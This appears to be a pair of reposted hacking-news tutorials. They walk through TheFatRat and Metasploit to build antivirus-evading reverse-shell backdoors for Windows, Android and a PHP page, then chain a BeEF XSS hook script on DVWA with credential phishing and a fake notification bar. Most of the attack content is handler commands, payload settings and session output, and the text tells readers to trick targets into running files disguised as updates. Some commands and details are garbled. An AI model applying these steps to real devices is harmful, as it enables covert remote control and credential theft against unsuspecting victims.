According to ethical hacking researcher of International Institute of Cyber Security did a detailed analysis on the working of TheFatRat to check on the insides of pentesting tool.

TheFatRat is an another metasploit like tool which is used to generate backdoor easily. This tool is used to compile some of the malware with some popular payloads which then can be used to attack operating systems like Windows, MAC, Linux. This tool gives many options like creating backdoors, infected dlls, as per ethical hacking investigation..

The whole tool has been tested on Parrot OS. And after creating backdoors. These backdoors has been opened on Windows 10 Build 1607 and android.

• For cloning type https://github.com/Screetsec/TheFatRat.git
• Then type cd TheFatRat
• Type chmod u+x setup.sh
• Type ./setup.sh
• If mono does not install type sudo apt-get update and sudo apt-get install mono-mcs or type sudo apt-get install mono-devel or type sudo apt-get install mono-complete
• As some of the dependencies related to mono does no install directly. so simply run above commands.
• In installation phase it will ask to create shortcut in parrot OS. Simply type y  after installation you can run fatrat just like you run msfconsole.
• After then type fatrat

• As you can TheFatRat gives tons of options to create session in target windows or other platforms.

Creating An Simple Exploit To Hack Windows 10 :-

• Type 6 will create fud backdoor using pwnwinds.

• Then type 2 which will create fud backdoor using c# + powershell.

• Enter LHOST listener/attacker IP address. Type 192.168.1.12
• Type port 4444 or any port number.
• Enter backdoor file name tstfile

• Type 3 for using windows/meterpreter/reverse_tcp.

• Press enter for creating backdoor.

• After backdoor is creating it will save in /home/user/Downloads/TheFatRat/output/tstfile.exe
• For accessing backdoor go to above location.

• Open another terminal and start msfconsole. Msfconsole wiil be used to handle ongoing session.
• Type msfconsole
• After msfconsole has started type use exploit/multi/handler
• Then type set payload windows/meterpreter/reverse_tcp
• Type LHOST 192.168.1.12
• Type LPORT 4444
• Type exploit

msf5 > use exploit/multi/handler
 msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
 payload => windows/meterpreter/reverse_tcp
 msf5 exploit(multi/handler) > set LHOST 192.168.1.12
 LHOST => 192.168.1.12
 msf5 exploit(multi/handler) > set LPORT 4444
 LPORT => 4444
 msf5 exploit(multi/handler) > exploit

• Now for opening backdoor in Windows 10. Simply copy from here and paste to pendrive and open pendrive in Windows 10. You can also use any social engineering technique (like by Fake any website in seconds) to pass this exe to TARGET computer.
• You have to copy two files tstfile.exe and program.cs. As this backdoor has created using C#
• And then double click on tstfile.exe

• As target click on the file a popup will came out and then meterpreter session will be opened.

• As shown below meterpreter session has started in msfconsole.

msf5 exploit(multi/handler) > exploit
 [] Started reverse TCP handler on 192.168.1.12:4444 [] Sending stage (179779 bytes) to 192.168.1.5
 [*] Meterpreter session 1 opened (192.168.1.12:4444 -> 192.168.1.5:61050) at 2019-01-30 12:24:04 +0000
 meterpreter > sysinfo
 Computer        : DESKTOP-2304ULE
 OS              : Windows 10 (Build 16299).
 Architecture    : x64
 System Language : en_US
 Domain          : WORKGROUP
 Logged On Users : 2
 Meterpreter     : x86/windows
 meterpreter >

• The above target is using Widnows 10. As session has created attacker can perform various tasks.

Creating Backdoor easily with another option (with C code):-

• Type 6

• Type 6

• Type 6

• Enter LHOST listener/attacker IP address. Type 192.168.1.12
• Type port 4444 or any port number.
• Enter backdoor file name tstfile
• Press enter to create backdoor.
• Open another terminal and start msfconsole. Msfconsole wiil be used to handle ongoing session.
  
• Type msfconsole
  
• After msfconsole has started type use exploit/multi/handler
  
• Then type set payload windows/meterpreter/reverse_tcp
  
• Type LHOST 192.168.1.12
  
• Type LPORT 4444
  
• Type exploit

msf5 > use exploit/multi/handler
 msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
 payload => windows/meterpreter/reverse_tcp
 msf5 exploit(multi/handler) > set LHOST 192.168.1.12
 LHOST => 192.168.1.12
 msf5 exploit(multi/handler) > set LPORT 4444
 LPORT => 4444
 msf5 exploit(multi/handler) > exploit

• As target open malicious file (tstfile.exe) in windows 10. A meterpreter session will start.

[] Started reverse TCP handler on 192.168.1.12:4444 [] Sending stage (179779 bytes) to 192.168.1.5
 [*] Meterpreter session 2 opened (192.168.1.12:4444 -> 192.168.1.5:61331) at 2019-01-30 15:19:28 +0000
 meterpreter > 

• As you can see meterpreter session has start in attacker machine. Now attacker can easily manipulate target.

Creating Backdoor Using Apache + Powershell :-

• Type 6

• Type 3

• Enter LHOST listener/attacker IP address. Type 192.168.1.12
• Type port 4444 or any port number.
• Enter backdoor file name tstfile1

• Type 3
• Press enter to create backdoor.

• Open above created backdoor in Windows 10. Or trick your target to open above file in their pc.
• Open another terminal and start msfconsole. Msfconsole wiil be used to handle ongoing session.
  
• Type msfconsole
  
• After msfconsole has started type use exploit/multi/handler
  
• Then type set payload windows/meterpreter/reverse_tcp
  
• Type LHOST 192.168.1.12
  
• Type LPORT 4444
  
• Type exploit
• As target opens backdoor (tstfile1.exe) a new session will be created in windows

 [] Sending stage (179779 bytes) to 192.168.1.5 [] Meterpreter session 3 opened (192.168.1.12:4444 -> 192.168.1.5:61336) at 2019-01-30 15:20:01 +0000
meterpreter > 

The difference between backdoors are that 1st backdoor uses c# + powershell where you files to the target. And second backdoor where you have to simply choose the options to create backdoor. As another backdoor requires to set payload. And the third where the backdoor uses a webserver apache to create backdoor. The third backdoor makes a strong backdoor for attackers. The session does not get expired easily. As the above two expires session suddenly while testing, according to ethical hacking courses.

Inject Using PHP:-

• Here we will create backdoor using php. Type 1

• Then type 5
• Type LHOST 192.168.1.7
• Then type port 80
• Enter file name tstfile

• As shown in the above image. This backdoor is using windows payload for creating an session.
• After payload has created. Move payload to apache server location. As this payload will be opened using Ip address.
• Type cp tstfile.php /var/www/html
• Then type sudo serivce apache2 start
• Then go to target windows browser and type 192.168.1.7/tstfile.php

• As target open above URL. A php script will start in background and session will start as shown below.

 
[*] Meterpreter session 1 opened (192.168.1.12:80 -> 192.168.1.5:61331) at 2019-01-30 17:45:28 +0000 
Id                       Information                   Connection 
 ------                   ------------                 -----------
 1 meterpreter php/linux www-data (33) @apache2  192.168.1.7:80 -> 192.178.1.5:61331
 
msf exploit(handler) > session -i 1
 meterpreter > sysinfo
 Computer        : DESKTOP-2304ULE
 OS              : Windows 10 (Build 16299).
 Architecture    : x64
 System Language : en_US
 Domain          : WORKGROUP
 Logged On Users : 2
 Meterpreter     : x86/windows
 meterpreter > 

• After opening just a URL. Target can easily got hacked.

Attacking An Android Device :-

• Type 1

• Type 192.168.1.7
• Type 4444
• Then backdoor
• Type 3

• Press enter to create backdoor.
• This is create a infected .apk file

• We will open backdoor in android mobile. Here we have use Android 4.4 Lolipop.
• Create an multi handler inside msfconsole.
• Type use exploit/multi/handler
• Type set payload android/meterpreter/reverse_tcp
• Type set 192.168.1.7
• Type set 4444
• Type exploit

msf5 > use exploit/multi/handler
 msf5 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
 payload => android/meterpreter/reverse_tcp
 msf5 exploit(multi/handler) > set LHOST 192.168.1.7
 LHOST => 192.168.1.7
 msf5 exploit(multi/handler) > set LPORT 4444
 LPORT => 4444
 msf5 exploit(multi/handler) > exploit

• Install the above backdoor.apk

• As backdoor.apk is opened in android a new session will be created in msfconsole. As per digital forensic expert from International Institute of Cyber Security users should be cautious while downloading any new Android app, as it can be android trojan.

[] Started reverse TCP handler on 192.168.1.7:4444 [] Sending stage (70554 bytes) to 192.168.1.12
 [*] Meterpreter session 1 opened (192.168.1.7:4444 -> 192.168.1.12:58445) at 2019-01-31 02:04:20 +0000
 meterpreter > help
 Core Commands
 Command                   Description -------                   ----------- ?                         Help menu background                Backgrounds the current session bg                        Alias for background bgkill                    Kills a background meterpreter script bglist                    Lists running background scripts bgrun                     Executes a meterpreter script as a background thread channel                   Displays information or control active channels close                     Closes a channel disable_unicode_encoding  Disables encoding of unicode strings enable_unicode_encoding   Enables encoding of unicode strings exit                      Terminate the meterpreter session get_timeouts              Get the current session timeout values guid                      Get the session GUID help                      Help menu info                      Displays information about a Post module irb                       Open an interactive Ruby shell on the current session load                      Load one or more meterpreter extensions machine_id                Get the MSF ID of the machine attached to the session pry                       Open the Pry debugger on the current session quit                      Terminate the meterpreter session read                      Reads data from a channel resource                  Run the commands stored in a file run                       Executes a meterpreter script or Post module sessions                  Quickly switch to another session set_timeouts              Set the current session timeout values sleep                     Force Meterpreter to go quiet, then re-establish session. transport                 Change the current transport mechanism use                       Deprecated alias for "load" uuid                      Get the UUID for the current session write                     Writes data to a channel

• Type sysinfo

meterpreter > sysinfo
 Computer    : localhost
 OS          : Android 4.4.2 - Linux 3.10.52-android-x86+ (i686)
 Meterpreter : dalvik/android
 meterpreter >

• As the attacker can take advantage of target android device.

The post Hack Windows, Android, Mac using TheFatRat (Step by Step tutorial) appeared first on Information Security Newspaper | Hacking News.

General description of the laboratory

According to the professional in cyber security, the first thing is to exploit a victim’s web browser using a tool called Browser Exploitation Framework or BeEF. It is a penetration test tool that focuses on the web browser, and can be found at:

https://beefproject.com/

Step 1:

This step uses a cross-site scripting vulnerability on a web server to attack the victim. The information security specialist told that the goal is to get a victim to explore a site and compromise their machine using BeEF. In this lab, the web server of the Damn Vulnerable web application (DVWA) was used. You could also insert your code into any web site or web application with public orientation that has cross-site scripting (XSS) vulnerabilities.

Step 2:

In the second part, TheFatRat is used to create and package a client attack script. The attack script TheFatRat is a batch file that will eventually make the victim run it on his own computer. PowerShell will be used to do this and we hope to avoid AV detection.

Step 3:

In the third step the infection of TheFatRat is completed by using BeEF to socially engineering the user when executes the batch file of TheFatRat attack. When this is done, a reverse Meterpreter shell is returned to the client.

Vulnerable web server:

In this test, DVWA was used as our web server since it has been developed in XSS vulnerabilities and we can exploit it. The cyber security researcher comment that it`s possible to use any website or web server that has XSS vulnerability. It could also trick the victim into going directly to BeEF’s ‘hooked’ website. The ISO DVWA v1.0.7 LiveCD image is being used for this project that can be downloaded at:

https://www.dvwa.co.uk/DVWA-1.0.7.is

Lab Systems:

The test is performed with the following systems:

Attacker: Kali Linux, 192.168.99.130

Web Server with XSS vulnerability: DVWA, 192.168.99.129

Victim: Windows 10 (fully patched with Microsoft Defender), 192.168.99.131

Open BeEF

Using the Kali Linux machine, the information security expert navigates to Applications / Social Engineering / Beef XSS Framework BeEF is started. The BeEF console looks like the following screenshot:

Note the URL of the hook’s webpage. BeEF should show this:

Now 127.0.0.1:3000 is changed to the IP address of the attacker. It looks like this:

<script src = “https://192.168.99.130:3000/hook.js”&gt; </ script>

The correct syntax is noted and copied into a text editor for future use. This window is kept open for the rest of the test. The cyber security expert said that the BeEF administration console must be in the Kali Linux web browser it must be opened normally automatically after starting BeEF. If this does not happen go to the URL:

https://127.0.0.1:3000/ui/authentication

The username and password to BeEF is beef / beef

Configure DVWA

At this point the web browser opens, go to the DVWA server (the IP address is 192.168.99.129) and log in. The user name and password for DVWA are admin / password.

When using DVWA, the configuration is changed to low to provide XSS vulnerabilities. This is done from the Kali Linux attack box. Open a web browser and select DVWA Security. Change the security level to low and press send. It is noted that the security level has changed to low in the bottom of the web browser.

The next thing to do is select the XSS tab, and in the Kali web browser navigate to Tools / Web Developer / Inspector as shown below:

The inspector box of the web page will open. The professional in information security click inside the name field on the web page, and the inspector box will move to the web source code that corresponds to that section of the page. The maximum length is set to 10. Simply change this number to 100.

Now write the XSS script command in the name field:

<script src = “https://192.168.99.130:3000/hook.js”&gt; </ script>

It is necessary to put something in the field of the message. Just enter something because it does not matter. Open another browser tab, and go to BeEF administration console. The BeEF administration console is located at:

https://127.0.0.1:3000/ui/authentication

The cyber security expert makes sure that the BeEF terminal window is still open. Again, the username and password are beef. Then from the victim’s machine (IP address 192.168.99.131) goes to the web server (DVWA, IP address 192.168.99.129). Log in again with the username and password of admin / password. Click on the XSS tab. You can see in the screenshot that the victim received a message.

Now returns to his Kali Linux machine and sees that the victim has been ‘hooked’ to BeEF. BeEF can perform a variety of social engineering attacks. Now click on the hooked browser, and then click on the command tab. From there, move on to Social Engineering. The information security researcher selects the pretty theft attack. When you select that attack, you can see how he can socially engineer the user into revealing their Facebook ID. When the user enters their credentials, they will be copied into your log.

Configuring TheFatRAT

The next step to using PowerShell is to distribute TheFatRat and evade AV detection. TheFatRat must be installed. Go to the TheFatRat directory in a new tab. When reach the main menu of TheFatRat, select option 6 – Create a bat + Powershell file (100% FUD).

Now you have to answer a list of questions:

LHOST: This is the IP address of the attack machine (Kali Linux).

LPORT: This is the port the victim will use for an outbound connection.

Output file: This is going to be the file the victim needs to run. Name it something unsuspicious so the victim will run it, such as update.

Type of Payload: Select Windows Reverse TCP Meterpreter

Leave the window open, minimize it, and open a new window.

Configuring the Metaploit Listener

Now the information security professional initiates a Metasploit listener. Then type msfconsole in a new terminal. When Metasploit is loaded, type the following commands, but remember to set the IP address and port as configured for the device when the attack batch file was created in TheFatRat.

msf> use multi/handler

msf exploit(multi/handler)> set PAYLOAD windows/meterpreter/reverse_tcp

msf exploit(multi/handler)> set LHOST 192.168.99.130

msf exploit(multi/handler)> set LPORT 443

Type exploit –j

Start the Apache web server, copy the attack script

The cyber security expert starts in a new window the web server by typing ‘service apache2 start’. Then, copy the file created with TheFatRat in the web server directory of the attack box by issuing the command ‘cp / var / www / html’.

At this moment the cyber security specialist is ready to exploit the victim by tricking her into executing the attack script that we created using TheFatRat. Now go back to the BeEF administration page. Check if the victim is still hooked. If not, you must reconnect them. When they are hooked, navigate to Social Engineering / Fake Notification Bar (Chrome).

Now change the URL of the notification of the default value (0.0.0.0:3000/dropper.exe) to the IP address of your attack machine and the name of the attack to that of the created script. Keep in mind that the Web server is enabled on the attack box and the attack script is copied (he called in lab2) to the Web root directory. The configuration reflects that.

Now the user gets prompted for your social engineering attack through their Web browser as shown below.

The user is prompted to run the file.

When the user runs the attack script, the information security researcher will have a reverse session on his Metasploit terminal window with a created session as shown below.

The post How to hack computer using THEFATRAT and BEEF? appeared first on Information Security Newspaper | Hacking News.